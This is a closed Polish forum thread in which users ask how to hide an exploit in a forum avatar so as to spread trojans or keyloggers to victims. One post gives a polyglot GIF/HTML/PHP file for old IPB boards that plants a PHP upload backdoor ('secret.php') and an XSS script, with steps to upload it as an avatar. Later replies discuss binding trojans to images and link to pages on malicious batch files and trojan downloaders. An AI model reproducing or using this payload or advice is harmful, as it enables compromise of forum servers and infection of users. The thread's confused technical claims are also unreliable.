Explolit w Awatarze jak?

Status
Zamknięty.

RyBek

Użytkownik
Dołączył
Październik 11, 2006
Posty
20
Mógł by ktos powiedziec jak schowac explolit w awatarze i jakiego najlepiej uzyc.

Z Góry dzieki
<
 

Patrykuss

Użytkownik
Dołączył
Listopad 6, 2006
Posty
107
To zależy gdzie chcesz użyc awataru. Możesz na forum ale ma ono filtrowanie więc musiałbyś się wygimnastykować albo znaleść wersję podatną na to.

Jak schować exploit jakiś w avatar? Php i tworzenie obrazków. Możesz przechwycać np. sesje i zapysywać gdzieś ale tak jak pisałem. Nowsze wersje są odporne na takie manewry.
 

RyBek

Użytkownik
Dołączył
Październik 11, 2006
Posty
20
uuu ciezko to wygladaa niedalo by rady z zdjecie+binder+explolit=
<



A sa jakies poradniki do tego bo ja wogle niewiem o co w tym chodzi.
 

yras

Użytkownik
Dołączył
Grudzień 14, 2006
Posty
93
przylanczam do prosby
PS. a nie lepiej do sygnaturki na forum to wsadzic xD ?

Fajny exploit to sygnaturka, obrazek + serwer sciagany na kompa+uruchamiany + zabawa
smile.gif
 

3rr0rx

Użytkownik
Dołączył
Luty 10, 2007
Posty
712
znalazłem dziś coś takiego:
IPB php jpg upload
Kod:
This can perhaps leed to a vonerability. (only works i internet explorer)



open notedpad and save the following as hello.jpg
Kod:
<GIF89a?8??f???>

<html>

<head>

<title>Secret :: gifz</title>

</head>

</body>

<center>

<table width=75% border=1>

<tr>

<td bgcolor=gray>

<center>[u][b]By SecreT</font>[/b][/u]</center>



<FORM ENCTYPE="multipart/form-data" ACTION="upload.php" METHOD="POST">

<INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="100000">

Send this file: <INPUT NAME="userfile" TYPE="file">

<INPUT TYPE="submit" VALUE="Send">

</FORM>

<?

move_uploaded_file($userfile, "secret.php");

?>



</body>

</html></body></html>











<html><body><script>alert('hello:D');</script></body></html>
now go and upload it as your avatar, check the url of your avatar and you'll see.
Po angielsku ale no chyba skumacie oco chodzi ;] pozniej moge przetlumaczyc jak juz ktos nie rozumie...
PS. dziala na stare wersje IPB ;]
 

yras

Użytkownik
Dołączył
Grudzień 14, 2006
Posty
93
nie skumalem lekkawo, przetlumacz
A gdzie wgrac serwer zeby sobie go wzielo?
 

RyBek

Użytkownik
Dołączył
Październik 11, 2006
Posty
20
NO tak a konkretnie gdzie ten kod mam wpiac w nottnik i zbindowac ze zdjeciem
<
 

yras

Użytkownik
Dołączył
Grudzień 14, 2006
Posty
93
Error_PL

ci mega HAxsi0rzy widac ze z tibii wzieci^^

Wez mi tylko powiedz gdzie wpisuje sie adres do serwera bo jesli dobrze zroumialem to dziala to tak ze pobiera i wlancza trojana....

I rozumiem ze ten serwer trojana ma byc na ftp..
Ale gdzie wpisac do niego linka
 

RyBek

Użytkownik
Dołączył
Październik 11, 2006
Posty
20
dokladnie gdzie ma wpisac ten link do trojana na ftp i jak potem sie polaczyc z tym?
 

3rr0rx

Użytkownik
Dołączył
Luty 10, 2007
Posty
712
Mnie sie nie pytac, ja tylko zapodalem kod ;]
BTW. o jakim wy trojanie gadacie !? :whoeva:
 

yras

Użytkownik
Dołączył
Grudzień 14, 2006
Posty
93
omg...
Ten exploit jest po to aby "serwer trojana" (czytaj nasz virus .exe) zainstalowal sie i zapisal na kompie ofiary, a mi chodzi o to gdzie w tym skrypcie jest miejsce co ma pobierac
 

Patrykuss

Użytkownik
Dołączył
Listopad 6, 2006
Posty
107
O czym ty gadasz? Pmyliłeś tematy czy co? Tutaj jest o exploicie w avatarze. Nigdzie w całym topicu nawet nie widzę ciągu znaków exe.
 

3rr0rx

Użytkownik
Dołączył
Luty 10, 2007
Posty
712
Originally posted by Patrykuss
O czym ty gadasz? Pmyliłeś tematy czy co? Tutaj jest o exploicie w avatarze. Nigdzie w całym topicu nawet nie widzę ciągu znaków exe.
Dokładnie, coś Ci się chyba pochrzaniło :>
 

grzonu

Były Moderator
Dołączył
Grudzień 26, 2006
Posty
1390
LOL

Normalnie zj***lem sie z krzesla jak to czytałem!
jak nawet zbindujesz jpg z serwerem to nie bedzie to juz jpg tylko exe czyli plik wykonywalny i juz jako avatar nie wrzucisz. a jak zmienisz rozszerzenie na jpg to ci sie serwerek nie odpali bo to juz nie jest plik wykonywalny!!! bylo juz o tym z 100 razy nie binduje sie z *.jpg
 

RyBek

Użytkownik
Dołączył
Październik 11, 2006
Posty
20
jak dobrze rozumiem expolot jest to skrypt skury zapisuje sie na kopie ofiary i sciaga tam naszego trojana/keyloger/itp.


To w takiem tazie gdzie mam wpisac w kodzie adres trojana/keyloger/itp.

<
Jak Dobrze to rozumiem
 

yras

Użytkownik
Dołączył
Grudzień 14, 2006
Posty
93
@up
myslalem tak samo ale chyba nie

moze ktos wytlumaczyc co ten exloit robi ;p ? :jem2:
 

grzonu

Były Moderator
Dołączył
Grudzień 26, 2006
Posty
1390
Originally posted by RyBek
jak dobrze rozumiem expolot jest to skrypt skury zapisuje sie na kopie ofiary i sciaga tam naszego trojana/keyloger/itp.


To w takiem tazie gdzie mam wpisac w kodzie adres trojana/keyloger/itp.

<
Jak Dobrze to rozumiem

jest naprzykład trojan downloader ale jest wykrywany przez wszystkie av. ale wrzucasz go jako skrypt java na stronke albo tu >> http://www.dawpi.info/txt/zlosliwe_batche.html

http://www.dawpi.info/txt/exe_na_html.html << albo to
 
Status
Zamknięty.
Do góry Bottom